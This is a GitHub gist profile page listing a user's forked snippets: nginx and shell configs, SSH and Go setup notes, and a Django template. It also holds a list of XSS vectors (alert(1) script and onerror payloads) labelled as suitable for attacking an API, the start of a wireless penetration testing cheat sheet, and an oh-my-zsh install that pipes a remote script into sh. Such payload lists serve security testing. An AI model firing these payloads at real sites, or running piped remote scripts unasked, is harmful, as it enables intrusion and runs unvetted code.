Kanin Peanviriyakulkit dogrocker

  • @LAMUNPUN IT
  • Thailand
@dogrocker
dogrocker / 666_lines_of_XSS_vectors.html
Created Nov 27, 2017 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
View 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@dogrocker
dogrocker / messages_and_errors_django_template.html
Created Jul 7, 2017 — forked from adamghill/messages_and_errors_django_template.html
Show messages and errors in Django templates. Useful to just throw in a base template.
View messages_and_errors_django_template.html
{% if messages %}
{% for message in messages %}
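{# |safe disables autoescaping: use it only when message text never contains user-controlled input #}
<div class="alert {% if message.tags %} alert-{{ message.tags }}{% endif %}">{{ message|safe }}</div>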
{% endfor %}
{% endif %}
{% if form.errors %}
<div class="alert alert-error">
<h4>Please fix the following errors</h4>
<ul>
@dogrocker
dogrocker / nginx.conf
Created Jun 13, 2017 — forked from plentz/nginx.conf
Best nginx configuration for improved security (and performance). Complete blog post here http://tautt.com/best-nginx-configuration-for-security/
View nginx.conf
# to generate your dhparam.pem file, run in the terminal
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
@dogrocker
dogrocker / .bashrc
Created Jul 21, 2016 — forked from vsouza/.bashrc
Golang 1.5 setup in Mac OSX with HomeBrew. Set `GOPATH` and `GOROOT` variables in zshell or bash.
View .bashrc
# Set variables in .bashrc file
# don't forget to change your path correctly!
export GOPATH=$HOME/golang
export GOROOT=/usr/local/opt/go/libexec
export PATH=$PATH:$GOPATH/bin
export PATH=$PATH:$GOROOT/bin
@dogrocker
dogrocker / multiple_ssh_setting.md
Created Jul 3, 2016 — forked from jexchan/multiple_ssh_setting.md
Multiple SSH keys for different github accounts
View multiple_ssh_setting.md

Multiple SSH Keys settings for different github accounts

Create different public keys

Create a different SSH key according to the article Mac Set-Up Git

$ ssh-keygen -t rsa -C "your_email@youremail.com"
@dogrocker
dogrocker / Wireless Penetration Testing Cheat Sheet.md
Created Jul 2, 2016
Wireless Penetration Testing Cheat Sheet
View Wireless Penetration Testing Cheat Sheet.md

# Wireless Penetration Testing Cheat Sheet

## WIRELESS ANTENNA

  • Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
View Oh my zsh with autosuggestions & syntax-highlighting.md

Oh my zsh.

Install with curl

sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"

Enabling Plugins (zsh-autosuggestions & zsh-syntax-highlighting)

  • Download zsh-autosuggestions by
@dogrocker
dogrocker / README.md
Created Jun 7, 2016 — forked from joyrexus/README.md
Form/file uploads with hapi.js
View README.md

Demo of multipart form/file uploading with hapi.js.

Usage

npm install
npm run setup
npm run server

Then ...

@dogrocker
dogrocker / Yii2 clone table prefix function in to javascript.md
Last active Apr 21, 2016
Returns the actual name of a given table name.
View Yii2 clone table prefix function in to javascript.md

This method will strip off curly brackets from the given table name

and replace the percentage character '%' with [[tablePrefix]].

// Strip the {{ }} wrapper, then replace every '%' with the table prefix
let re = /{{(.*?)}}/g
let str = 'SELECT * FROM {{%user}} WHERE id IN (?)'
let tablePrefix = 'tbl_'
console.log(str.replace(re, '$1').replace(/%/g, tablePrefix))
@dogrocker
dogrocker / API.md
Created Jan 11, 2016 — forked from iros/API.md
Documenting your REST API
View API.md

Title

<Additional information about your API call. Try to use verbs that match both request type (fetching vs modifying) and plurality (one vs multiple).>

  • URL

    <The URL Structure (path only, no root url)>

  • Method:
